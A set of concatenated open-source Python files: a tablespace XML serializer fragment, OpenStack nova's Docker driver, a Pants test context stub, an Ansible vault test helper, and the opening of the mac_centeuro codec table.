    attrs['id'] = tablespace.identifier
    attrs['name'] = tablespace.name
    attrs['type'] = tablespace.type
    # Optional attributes: emit each only when its computed value is truthy.
    for attr_name, attr_value in (
            ('owner', tablespace.owner),
            ('system', 'system' if tablespace.system else None),
            ('created',
             tablespace.created.isoformat() if tablespace.created else None),
    ):
        if attr_value:
            attrs[attr_name] = attr_value
    if tablespace.description:
        SubElement(result, 'description').text = tablespace.description
    # XXX Include table and index lists (containstable/containsindex
    # children)? Deliberately omitted for now.
    return result
| gpl-3.0 |
TieWei/nova | nova/virt/docker/driver.py | 4 | 15419 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Docker Hypervisor which allows running Linux Containers instead of VMs.
"""
import os
import random
import socket
import time
from oslo.config import cfg
from nova.compute import power_state
from nova.compute import task_states
from nova import exception
from nova.image import glance
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log
from nova import utils
import nova.virt.docker.client
from nova.virt.docker import hostinfo
from nova.virt import driver
docker_opts = [
cfg.IntOpt('docker_registry_default_port',
default=5042,
help=_('Default TCP port to find the '
'docker-registry container')),
]
CONF = cfg.CONF
CONF.register_opts(docker_opts)
CONF.import_opt('my_ip', 'nova.netconf')
LOG = log.getLogger(__name__)
class DockerDriver(driver.ComputeDriver):
    """Docker hypervisor driver.

    Implements the nova virt driver interface on top of the docker daemon's
    HTTP API: nova instances are containers (matched by container Hostname ==
    instance name), and images come from a docker-registry container found on
    this host (or a registry on the configured default port).
    """

    capabilities = {
        'has_imagecache': True,
        'supports_recreate': True,
    }

    def __init__(self, virtapi):
        super(DockerDriver, self).__init__(virtapi)
        # HTTP client for the docker daemon; created lazily by the ``docker``
        # property so constructing the driver has no connection side effects.
        self._docker = None

    @property
    def docker(self):
        # Lazily instantiate (then cache) the daemon client.
        if self._docker is None:
            self._docker = nova.virt.docker.client.DockerHTTPClient()
        return self._docker

    def init_host(self, host):
        # Fail fast at compute-service startup when the daemon socket is
        # unreachable, rather than on the first instance operation.
        if self.is_daemon_running() is False:
            raise exception.NovaException(_('Docker daemon is not running or '
                'is not reachable (check the rights on /var/run/docker.sock)'))

    def is_daemon_running(self):
        """Return True if the docker daemon answers on its socket."""
        try:
            self.docker.list_containers()
            return True
        except socket.error:
            # NOTE(samalba): If the daemon is not running, we'll get a socket
            # error. The list_containers call is safe to call often, there
            # is an internal hard limit in docker if the amount of containers
            # is huge.
            return False

    def list_instances(self, inspect=False):
        """List known containers.

        :param inspect: when True return full inspect dicts; otherwise just
                        the container hostnames (== nova instance names).
        """
        res = []
        for container in self.docker.list_containers():
            info = self.docker.inspect_container(container['id'])
            if inspect:
                res.append(info)
            else:
                res.append(info['Config'].get('Hostname'))
        return res

    def plug_vifs(self, instance, network_info):
        """Plug VIFs into networks."""
        pass

    def unplug_vifs(self, instance, network_info):
        """Unplug VIFs from networks."""
        pass

    def find_container_by_name(self, name):
        """Return the inspect dict of the container whose Hostname is *name*,
        or {} when no such container exists.
        """
        for info in self.list_instances(inspect=True):
            if info['Config'].get('Hostname') == name:
                return info
        return {}

    def get_info(self, instance):
        """Return the standard nova info dict for *instance*.

        :raises InstanceNotFound: when no container matches the instance name.
        """
        container = self.find_container_by_name(instance['name'])
        if not container:
            raise exception.InstanceNotFound(instance_id=instance['name'])
        running = container['State'].get('Running')
        # Memory/CPU accounting is not implemented for containers, so these
        # are fixed placeholders; only 'state' is meaningful.
        info = {
            'max_mem': 0,
            'mem': 0,
            'num_cpu': 1,
            'cpu_time': 0
        }
        info['state'] = power_state.RUNNING if running \
            else power_state.SHUTDOWN
        return info

    def get_host_stats(self, refresh=False):
        # NOTE(review): ``memory`` and ``disk`` are computed but never used
        # here, and the first 'hypervisor_hostname' assignment is a no-op;
        # the real numbers all come from get_available_resource().
        hostname = socket.gethostname()
        memory = hostinfo.get_memory_usage()
        disk = hostinfo.get_disk_usage()
        stats = self.get_available_resource(hostname)
        stats['hypervisor_hostname'] = stats['hypervisor_hostname']
        stats['host_hostname'] = stats['hypervisor_hostname']
        stats['host_name_label'] = stats['hypervisor_hostname']
        return stats

    def get_available_resource(self, nodename):
        """Report host resources (cpu/memory/disk) for the scheduler."""
        # Pin the first nodename seen; a hostname change mid-run would break
        # resource tracking, so it is only logged until a restart.
        if not hasattr(self, '_nodename'):
            self._nodename = nodename
        if nodename != self._nodename:
            LOG.error(_('Hostname has changed from %(old)s to %(new)s. '
                        'A restart is required to take effect.'
                        ) % {'old': self._nodename,
                             'new': nodename})
        memory = hostinfo.get_memory_usage()
        disk = hostinfo.get_disk_usage()
        stats = {
            'vcpus': 1,
            'vcpus_used': 0,
            'memory_mb': memory['total'] / (1024 ** 2),
            'memory_mb_used': memory['used'] / (1024 ** 2),
            'local_gb': disk['total'] / (1024 ** 3),
            'local_gb_used': disk['used'] / (1024 ** 3),
            'disk_available_least': disk['available'] / (1024 ** 3),
            'hypervisor_type': 'docker',
            'hypervisor_version': '1.0',
            'hypervisor_hostname': self._nodename,
            'cpu_info': '?',
            'supported_instances': jsonutils.dumps([
                ('i686', 'docker', 'lxc'),
                ('x86_64', 'docker', 'lxc')
            ])
        }
        return stats

    def _find_cgroup_devices_path(self):
        # Parse /proc/mounts for the mountpoint of the cgroup "devices"
        # controller. Returns None (implicitly) when no such mount exists.
        for ln in open('/proc/mounts'):
            if ln.startswith('cgroup ') and 'devices' in ln:
                return ln.split(' ')[1]

    def _find_container_pid(self, container_id):
        """Return the first PID running inside *container_id* (read from the
        lxc cgroup tasks file), or None if none appears within ~10 seconds.
        """
        cgroup_path = self._find_cgroup_devices_path()
        lxc_path = os.path.join(cgroup_path, 'lxc')
        tasks_path = os.path.join(lxc_path, container_id, 'tasks')
        n = 0
        while True:
            # NOTE(samalba): We wait for the process to be spawned inside the
            # container in order to get the "container pid". This is
            # usually really fast. To avoid race conditions on a slow
            # machine, we allow 10 seconds as a hard limit.
            if n > 20:
                return
            try:
                with open(tasks_path) as f:
                    pids = f.readlines()
                    if pids:
                        return int(pids[0].strip())
            except IOError:
                # Tasks file not there yet; retry until the limit.
                pass
            time.sleep(0.5)
            n += 1

    def _find_fixed_ip(self, subnets):
        # First non-empty fixed IP address found across the subnets, or
        # None (implicitly) when there is none.
        for subnet in subnets:
            for ip in subnet['ips']:
                if ip['type'] == 'fixed' and ip['address']:
                    return ip['address']

    def _setup_network(self, instance, network_info):
        """Wire the container into the nova network bridge.

        Creates a veth pair, attaches the local end to the bridge, moves the
        remote end into the container's network namespace, and assigns the
        instance's fixed IP. Steps after veth creation are rolled back via
        UndoManager on failure.
        """
        if not network_info:
            return
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        # Only the first network is plumbed.
        network_info = network_info[0]['network']
        netns_path = '/var/run/netns'
        if not os.path.exists(netns_path):
            utils.execute(
                'mkdir', '-p', netns_path, run_as_root=True)
        nspid = self._find_container_pid(container_id)
        if not nspid:
            msg = _('Cannot find any PID under container "{0}"')
            raise RuntimeError(msg.format(container_id))
        # Expose the container's netns to ``ip netns`` via a symlink named
        # after the container id.
        netns_path = os.path.join(netns_path, container_id)
        utils.execute(
            'ln', '-sf', '/proc/{0}/ns/net'.format(nspid),
            '/var/run/netns/{0}'.format(container_id),
            run_as_root=True)
        # Random suffix to avoid clashing with veth devices of other
        # containers on the same host.
        rand = random.randint(0, 100000)
        if_local_name = 'pvnetl{0}'.format(rand)
        if_remote_name = 'pvnetr{0}'.format(rand)
        bridge = network_info['bridge']
        ip = self._find_fixed_ip(network_info['subnets'])
        if not ip:
            raise RuntimeError(_('Cannot set fixed ip'))
        undo_mgr = utils.UndoManager()
        try:
            utils.execute(
                'ip', 'link', 'add', 'name', if_local_name, 'type',
                'veth', 'peer', 'name', if_remote_name,
                run_as_root=True)
            undo_mgr.undo_with(lambda: utils.execute(
                'ip', 'link', 'delete', if_local_name, run_as_root=True))
            # NOTE(samalba): Deleting the interface will delete all associated
            # resources (remove from the bridge, its pair, etc...)
            utils.execute(
                'brctl', 'addif', bridge, if_local_name,
                run_as_root=True)
            utils.execute(
                'ip', 'link', 'set', if_local_name, 'up',
                run_as_root=True)
            utils.execute(
                'ip', 'link', 'set', if_remote_name, 'netns', nspid,
                run_as_root=True)
            utils.execute(
                'ip', 'netns', 'exec', container_id, 'ifconfig',
                if_remote_name, ip,
                run_as_root=True)
        except Exception:
            msg = _('Failed to setup the network, rolling back')
            undo_mgr.rollback_and_reraise(msg=msg, instance=instance)

    def _get_memory_limit_bytes(self, instance):
        """Memory limit for the container in bytes, taken from the flavor's
        'instance_type_memory_mb' system metadata; 0 means unlimited.
        """
        for metadata in instance.get('system_metadata', []):
            if metadata['deleted']:
                continue
            if metadata['key'] == 'instance_type_memory_mb':
                return int(metadata['value']) * 1024 * 1024
        return 0

    def _get_image_name(self, context, instance, image):
        """Return the registry-qualified docker image name for *image*.

        :raises InstanceDeployFailure: for non-docker container formats.
        """
        fmt = image['container_format']
        if fmt != 'docker':
            msg = _('Image container format not supported ({0})')
            raise exception.InstanceDeployFailure(msg.format(fmt),
                instance_id=instance['name'])
        registry_port = self._get_registry_port()
        return '{0}:{1}/{2}'.format(CONF.my_ip,
                                    registry_port,
                                    image['name'])

    def _get_default_cmd(self, image_name):
        # Fallback command for images that define no Cmd. Returns None
        # (implicitly) when the image already has a Cmd, so docker's own
        # default is used; spawn() only sets args['Cmd'] on a truthy return.
        default_cmd = ['sh']
        info = self.docker.inspect_image(image_name)
        if not info:
            return default_cmd
        if not info['container_config']['Cmd']:
            return default_cmd

    def spawn(self, context, instance, image_meta, injected_files,
              admin_password, network_info=None, block_device_info=None):
        """Create and start a container for *instance*.

        Pulls the image from the registry when container creation fails for
        a missing image, then starts the container and sets up networking.

        :raises InstanceDeployFailure: on pull/create/network failure.
        """
        image_name = self._get_image_name(context, instance, image_meta)
        args = {
            'Hostname': instance['name'],
            'Image': image_name,
            'Memory': self._get_memory_limit_bytes(instance)
        }
        default_cmd = self._get_default_cmd(image_name)
        if default_cmd:
            args['Cmd'] = default_cmd
        container_id = self.docker.create_container(args)
        if not container_id:
            # Creation fails when the image is missing locally: pull once
            # and retry.
            msg = _('Image name "{0}" does not exist, fetching it...')
            LOG.info(msg.format(image_name))
            res = self.docker.pull_repository(image_name)
            if res is False:
                raise exception.InstanceDeployFailure(
                    _('Cannot pull missing image'),
                    instance_id=instance['name'])
            container_id = self.docker.create_container(args)
            if not container_id:
                raise exception.InstanceDeployFailure(
                    _('Cannot create container'),
                    instance_id=instance['name'])
        self.docker.start_container(container_id)
        try:
            self._setup_network(instance, network_info)
        except Exception as e:
            msg = _('Cannot setup network: {0}')
            raise exception.InstanceDeployFailure(msg.format(e),
                instance_id=instance['name'])

    def destroy(self, instance, network_info, block_device_info=None,
                destroy_disks=True):
        """Stop and delete the instance's container (no-op if missing)."""
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        self.docker.stop_container(container_id)
        self.docker.destroy_container(container_id)

    def reboot(self, context, instance, network_info, reboot_type,
               block_device_info=None, bad_volumes_callback=None):
        """Reboot by stopping then restarting the container; failures are
        logged rather than raised."""
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        if not self.docker.stop_container(container_id):
            LOG.warning(_('Cannot stop the container, '
                          'please check docker logs'))
        if not self.docker.start_container(container_id):
            LOG.warning(_('Cannot restart the container, '
                          'please check docker logs'))

    def power_on(self, context, instance, network_info, block_device_info):
        # Start the container backing the instance (no-op if missing).
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        self.docker.start_container(container_id)

    def power_off(self, instance):
        # Stop the container backing the instance (no-op if missing).
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        self.docker.stop_container(container_id)

    def get_console_output(self, instance):
        # The container's stdout/stderr doubles as the instance console log.
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            return
        return self.docker.get_container_logs(container_id)

    def _get_registry_port(self):
        """Return the host TCP port of the local docker-registry container,
        or the configured default when none is found/mapped.
        """
        default_port = CONF.docker_registry_default_port
        registry = None
        for container in self.docker.list_containers(_all=False):
            container = self.docker.inspect_container(container['id'])
            if 'docker-registry' in container['Path']:
                registry = container
                break
        if not registry:
            return default_port
        # NOTE(samalba): The registry service always binds on port 5000 in the
        # container
        try:
            return container['NetworkSettings']['PortMapping']['Tcp']['5000']
        except (KeyError, TypeError):
            # NOTE(samalba): Falling back to a default port allows more
            # flexibility (run docker-registry outside a container)
            return default_port

    def snapshot(self, context, instance, image_href, update_task_state):
        """Commit the container as a new image and push it to the registry.

        :raises InstanceNotRunning: when the container does not exist.
        """
        container_id = self.find_container_by_name(instance['name']).get('id')
        if not container_id:
            raise exception.InstanceNotRunning(instance_id=instance['uuid'])
        update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
        (image_service, image_id) = glance.get_remote_image_service(
            context, image_href)
        image = image_service.show(context, image_id)
        registry_port = self._get_registry_port()
        name = image['name']
        # Tag the commit with ':latest' unless the glance image name already
        # carries its own tag.
        default_tag = (':' not in name)
        name = '{0}:{1}/{2}'.format(CONF.my_ip,
                                    registry_port,
                                    name)
        commit_name = name if not default_tag else name + ':latest'
        self.docker.commit_container(container_id, commit_name)
        update_task_state(task_state=task_states.IMAGE_UPLOADING,
                          expected_state=task_states.IMAGE_PENDING_UPLOAD)
        # The glance image id travels in a header so the registry side can
        # match the pushed repository back to the glance image record.
        headers = {'X-Meta-Glance-Image-Id': image_href}
        self.docker.push_repository(name, headers=headers)
| apache-2.0 |
dturner-tw/pants | tests/python/pants_test/base/context_utils.py | 2 | 3629 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import sys
from contextlib import contextmanager
from twitter.common.collections import maybe_list
from pants.base.workunit import WorkUnit
from pants.build_graph.target import Target
from pants.goal.context import Context
from pants_test.option.util.fakes import create_options
class TestContext(Context):
    """A Context to use during unittesting.

    Stubs out various dependencies that we don't want to introduce in unit tests.

    TODO: Instead of extending the runtime Context class, create a Context interface and have
    TestContext and a runtime Context implementation extend that. This will also allow us to
    isolate the parts of the interface that a Task is allowed to use vs. the parts that the
    task-running machinery is allowed to use.
    """

    class DummyWorkUnit(object):
        """A workunit stand-in that sends all output to stderr.

        These outputs are typically only used by subprocesses spawned by code under test, not
        the code under test itself, and would otherwise go into some reporting black hole. The
        testing framework will only display the stderr output when a test fails.

        Provides no other tracking/labeling/reporting functionality. Does not require "opening"
        or "closing".
        """

        def output(self, name):
            # Every named output stream maps to stderr.
            return sys.stderr

        def set_outcome(self, outcome):
            # Report the outcome on stderr instead of recording it.
            return sys.stderr.write('\nWorkUnit outcome: {}\n'.format(WorkUnit.outcome_string(outcome)))

    class DummyRunTracker(object):
        """A runtracker stand-in that does no actual tracking."""

        class DummyArtifactCacheStats(object):
            # Cache-statistic hooks are accepted and ignored.
            def add_hits(self, cache_name, targets): pass

            def add_misses(self, cache_name, targets, causes): pass

        artifact_cache_stats = DummyArtifactCacheStats()

    @contextmanager
    def new_workunit(self, name, labels=None, cmd='', log_config=None):
        # Announce the workunit on stderr and hand the caller the dummy
        # stand-in; no reporting machinery is involved.
        sys.stderr.write('\nStarting workunit {}\n'.format(name))
        yield TestContext.DummyWorkUnit()

    @property
    def log(self):
        # A plain stdlib logger instead of the run-tracker-backed report log.
        return logging.getLogger('test')

    def submit_background_work_chain(self, work_chain, parent_workunit_name=None):
        # Just do the work synchronously, so we don't need a run tracker, background workers and so on.
        for work in work_chain:
            for args_tuple in work.args_tuples:
                work.func(*args_tuple)

    def subproc_map(self, f, items):
        # Just execute in-process.
        return map(f, items)
# TODO: Make Console and Workspace into subsystems, and simplify this signature.
def create_context(options=None, passthru_args=None, target_roots=None, build_graph=None,
                   build_file_parser=None, address_mapper=None,
                   console_outstream=None, workspace=None):
    """Creates a ``Context`` with no options or targets by default.

    :param options: A map of scope -> (map of key to value).

    Other params are as for ``Context``.
    """
    resolved_options = create_options(options or {}, passthru_args=passthru_args)
    roots = maybe_list(target_roots, Target) if target_roots else []
    return TestContext(options=resolved_options,
                       run_tracker=TestContext.DummyRunTracker(),
                       target_roots=roots,
                       build_graph=build_graph,
                       build_file_parser=build_file_parser,
                       address_mapper=address_mapper,
                       console_outstream=console_outstream,
                       workspace=workspace)
| apache-2.0 |
alexlo03/ansible | test/units/mock/vault_helper.py | 206 | 1559 | # Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils._text import to_bytes
from ansible.parsing.vault import VaultSecret
class TextVaultSecret(VaultSecret):
    '''A secret piece of text. ie, a password. Tracks text encoding.

    The text encoding of the text may not be the default text encoding so
    we keep track of the encoding so we encode it to the same bytes.'''

    def __init__(self, text, encoding=None, errors=None, _bytes=None):
        super(TextVaultSecret, self).__init__()
        self.text = text
        # Fall back to defaults for falsy encoding/errors values.
        self.encoding = encoding if encoding else 'utf-8'
        self._bytes = _bytes
        self.errors = errors if errors else 'strict'

    @property
    def bytes(self):
        '''The text encoded with encoding, unless we specifically set _bytes.'''
        if self._bytes:
            return self._bytes
        return to_bytes(self.text, encoding=self.encoding, errors=self.errors)
| gpl-3.0 |
kubaszostak/gdal-dragndrop | osgeo/apps/Python27/Lib/encodings/mac_centeuro.py | 93 | 14665 | """ Python Character Mapping Codec mac_centeuro generated from 'MAPPINGS/VENDORS/APPLE/CENTEURO.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless one-shot codec backed by the generated charmap tables."""

    def encode(self,input,errors='strict'):
        return codecs.charmap_encode(input,errors,encoding_table)

    def decode(self,input,errors='strict'):
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    def encode(self, input, final=False):
        # Charmap encoding carries no state, so each chunk is a one-shot
        # encode; [0] drops the consumed-length part of the result tuple.
        return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    def decode(self, input, final=False):
        # Charmap decoding carries no state, so each chunk is a one-shot
        # decode; [0] drops the consumed-length part of the result tuple.
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream interface; all real work happens in Codec.encode().
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream interface; all real work happens in Codec.decode().
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record the codecs registry uses for this encoding."""
    return codecs.CodecInfo(
        name='mac-centeuro',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u0100' # 0x81 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u0101' # 0x82 -> LATIN SMALL LETTER A WITH MACRON
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0104' # 0x84 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\u0105' # 0x88 -> LATIN SMALL LETTER A WITH OGONEK
u'\u010c' # 0x89 -> LATIN CAPITAL LETTER C WITH CARON
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u010d' # 0x8B -> LATIN SMALL LETTER C WITH CARON
u'\u0106' # 0x8C -> LATIN CAPITAL LETTER C WITH ACUTE
u'\u0107' # 0x8D -> LATIN SMALL LETTER C WITH ACUTE
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\u0179' # 0x8F -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\u017a' # 0x90 -> LATIN SMALL LETTER Z WITH ACUTE
u'\u010e' # 0x91 -> LATIN CAPITAL LETTER D WITH CARON
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\u010f' # 0x93 -> LATIN SMALL LETTER D WITH CARON
u'\u0112' # 0x94 -> LATIN CAPITAL LETTER E WITH MACRON
u'\u0113' # 0x95 -> LATIN SMALL LETTER E WITH MACRON
u'\u0116' # 0x96 -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\u0117' # 0x98 -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\u011a' # 0x9D -> LATIN CAPITAL LETTER E WITH CARON
u'\u011b' # 0x9E -> LATIN SMALL LETTER E WITH CARON
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\u0118' # 0xA2 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\u0119' # 0xAB -> LATIN SMALL LETTER E WITH OGONEK
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\u0123' # 0xAE -> LATIN SMALL LETTER G WITH CEDILLA
u'\u012e' # 0xAF -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u012f' # 0xB0 -> LATIN SMALL LETTER I WITH OGONEK
u'\u012a' # 0xB1 -> LATIN CAPITAL LETTER I WITH MACRON
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
